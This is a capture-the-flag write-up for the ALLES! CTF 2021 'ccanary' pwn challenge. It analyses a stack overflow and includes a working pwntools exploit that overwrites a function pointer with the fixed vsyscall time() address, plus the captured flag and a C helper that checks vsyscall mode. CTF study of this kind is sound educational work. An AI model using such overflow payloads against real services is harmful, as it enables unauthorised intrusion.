## ccanary

> Points: 133
>
> Solves: 89

### Description:
I'm using arch btw... ¯\_(ツ)_/¯

### Attachments:
```
ccanary https://static.allesctf.net/1034e3b4626ce02001a330342be622edba032d07a8cbf6f0d3aecd4036370f40/ccanary
ccanary.c https://static.allesctf.net/ffa321004f1a6f232e38e8d314920e290ee50cfce02d1632e4dfee8d0abf1c1d/ccanary.c
```

## Analysis:

The C source of the challenge is mirrored here:
https://github.com/mito753/CTF/blob/main/2021/ALLES!_CTF_2021/Pwn_ccanary/ccanary.c

- The quote buffer starts at 0x7fffffffdd98 (the leading `"` is written by the program) and our input lands from 0x7fffffffdd99 onward, as the stack dump below shows.
- The flag is printed if the function pointer data.call_canary ((a), currently 0x0000555555555210) is not corrupted and a non-zero value is written into data.give_flag ((b), currently 0).
- However, PIE and ASLR are enabled, so the original value of data.call_canary cannot be guessed; simply restoring it while overflowing into data.give_flag is not an option.
```
0x7fffffffdd90: 0x00000000000000c2 0x79202d0a22414122   <- input starts at 0x7fffffffdd99, after the '"' at 0x7fffffffdd98
0x7fffffffdda0: 0x31323032202c756f 0x0000000000000000
0x7fffffffddb0: 0x0000000000000000 0x0000555555555210   <- (a) data.call_canary at 0x7fffffffddb8
0x7fffffffddc0: 0x0000000000000000 0xc18083ccda1b7d00   <- (b) data.give_flag at 0x7fffffffddc0; stack canary at 0x7fffffffddc8
0x7fffffffddd0: 0x00005555555553b0 0x00007ffff7a03bf7
```
The payload therefore needs 0x1f filler bytes, then 8 bytes for (a) and 8 bytes for (b). Those 47 bytes end at 0x7fffffffddc7, just before the stack canary, so the canary check is never triggered.

## Solution:

The legacy vsyscall page is mapped at the fixed address 0xffffffffff600000 in x86-64 processes, independent of PIE and ASLR, and its time() entry at 0xffffffffff600400 (syscall number 0xc9 = sys_time) is nothing more than `mov rax,0xc9; syscall; ret`. Writing that address over data.call_canary (a) therefore leaves a function pointer that can be called without a segmentation fault, and the same overflow can continue into data.give_flag (b) with the value 1. Caveat: this only works while the kernel still maps the page (vsyscall=emulate or vsyscall=xonly); with vsyscall=none the call faults, which is what the flag text hints at.

```
gdb-peda$ x/10i 0xffffffffff600400
0xffffffffff600400: mov rax,0xc9
0xffffffffff600407: syscall
0xffffffffff600409: ret
0xffffffffff60040a: int3
```
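Because the trick depends on the kernel's vsyscall mode, it is worth checking the target (or your own box) before relying on it. The following program is an added example, not code from the writeup or the challenge: it looks for the `[vsyscall]` mapping in /proc/self/maps, reports its permissions, and, only if the page is present, calls 0xffffffffff600400 through a function pointer exactly the way the overwritten data.call_canary would, comparing the returned value with time(NULL). The address of the page, the +0x400 offset of the time() entry, and the `[vsyscall]` label in the maps file are assumptions about x86-64 Linux; the function names are mine.

```c
/* Added example (not the challenge's own code): does the vsyscall trick
 * used above work on this kernel?
 * Assumptions: x86-64 Linux; legacy vsyscall page at 0xffffffffff600000 with
 * the time() entry at +0x400; the kernel lists it as "[vsyscall]" in
 * /proc/self/maps for vsyscall=emulate ("r-xp") and vsyscall=xonly ("--xp"),
 * and omits it for vsyscall=none (calling the address then faults). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define VSYSCALL_TIME_ADDR 0xffffffffff600400UL

/* Returns 1 if "[vsyscall]" is mapped in this process, 0 if it is not,
 * -1 if /proc/self/maps cannot be read. If perms is non-NULL the permission
 * field of the mapping (e.g. "r-xp" or "--xp") is copied into it. */
int vsyscall_page_present(char *perms, size_t perms_len)
{
    FILE *fp = fopen("/proc/self/maps", "r");
    if (!fp)
        return -1;
    char line[512];
    int found = 0;
    while (fgets(line, sizeof line, fp)) {
        if (strstr(line, "[vsyscall]")) {
            found = 1;
            if (perms && perms_len) {
                /* maps line: "start-end perms offset dev inode path" */
                char p[8] = {0};
                if (sscanf(line, "%*s %7s", p) == 1) {
                    strncpy(perms, p, perms_len - 1);
                    perms[perms_len - 1] = '\0';
                }
            }
            break;
        }
    }
    fclose(fp);
    return found;
}

/* Mirrors what the overwritten data.call_canary pointer does: jump to the
 * fixed address as if it were a function. Returns 1 if the page is mapped and
 * the call came back with a plausible time (within 5 s of time(NULL)),
 * 0 otherwise. The address is never called unless the page is mapped. */
int vsyscall_trick_works(void)
{
    if (vsyscall_page_present(NULL, 0) != 1)
        return 0;
    time_t (*vtime)(time_t *) = (time_t (*)(time_t *))VSYSCALL_TIME_ADDR;
    time_t now = time(NULL);
    time_t got = vtime(NULL);   /* executes: mov rax,0xc9 ; syscall ; ret */
    long delta = (long)got - (long)now;
    return delta >= -5 && delta <= 5;
}

int main(void)
{
    char perms[8] = "?";
    int present = vsyscall_page_present(perms, sizeof perms);
    if (present < 0) {
        puts("cannot read /proc/self/maps");
        return 1;
    }
    printf("[vsyscall] mapped: %s (perms %s)\n", present ? "yes" : "no", perms);
    printf("0xffffffffff600400 usable as a harmless function pointer: %s\n",
           vsyscall_trick_works() ? "yes" : "no (vsyscall=none?)");
    return 0;
}
```

On a kernel booted with vsyscall=none the first line reports `no` and the program exits without ever touching the address; on emulate or xonly kernels the call returns the current epoch time and the second line reports `yes`.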

## Exploit code:
```python
from pwn import *
import sys

#context(os='linux', arch='amd64')
#context.log_level = 'debug'

BINARY = './ccanary'
elf = ELF(BINARY)

if len(sys.argv) > 1 and sys.argv[1] == 'r':
    # the remote service is TLS-wrapped, so talk to it through ncat --ssl
    s = process("ncat --ssl 7b0000007c7be7ad4dab5be5-ccanary.challenge.master.allesctf.net 31337", shell=True)
else:
    s = process(BINARY)

s.recvuntil(b"quote> ")

buf = b"A" * 0x1f                 # fill the quote buffer up to data.call_canary
buf += p64(0xffffffffff600400)    # vsyscall time(): mov rax,0xc9; syscall; ret (fixed address, not randomised)
buf += p64(1)                     # data.give_flag = 1; payload ends just before the stack canary
s.sendline(buf)

s.interactive()
```

## Results:
```bash
mito@ubuntu:~/CTF/ALLES!_CTF_2021/Pwn_ccanary$ python solve.py r
[*] '/home/mito/CTF/ALLES!_CTF_2021/Pwn_ccanary/ccanary'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process '/bin/sh': pid 60051
[*] Switching to interactive mode
good birb!
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Here's the flag:
ALLES!{th1s_m1ght_n0t_work_on_y0ur_syst3m_:^)}
```

Original writeup (https://github.com/mito753/CTF/tree/main/2021/ALLES!_CTF_2021/Pwn_ccanary).